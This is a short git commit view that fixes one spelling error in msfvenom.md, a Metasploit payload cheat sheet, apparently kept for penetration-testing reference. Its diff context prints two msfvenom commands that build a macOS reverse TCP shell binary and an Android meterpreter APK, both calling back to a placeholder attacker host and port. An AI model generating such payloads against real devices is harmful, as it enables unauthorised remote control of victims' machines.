Update msfvenom.md

This commit is contained in:
Omar Santos 2020-01-07 13:46:56 -05:00 committed by GitHub
parent 5fc53941a9
commit 14129a6d42
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -12,7 +12,7 @@ MsfVenom is a Metasploit standalone payload generator as a replacement for msfpa
- `msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho`
- Creates a simple TCP Shell for Mac
- `msfvenom -p android/meterpreter/reverse/tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk`
- Creats a simple TCP Payload for Android
- Creates a simple TCP Payload for Android
## Web Payloads
Command Info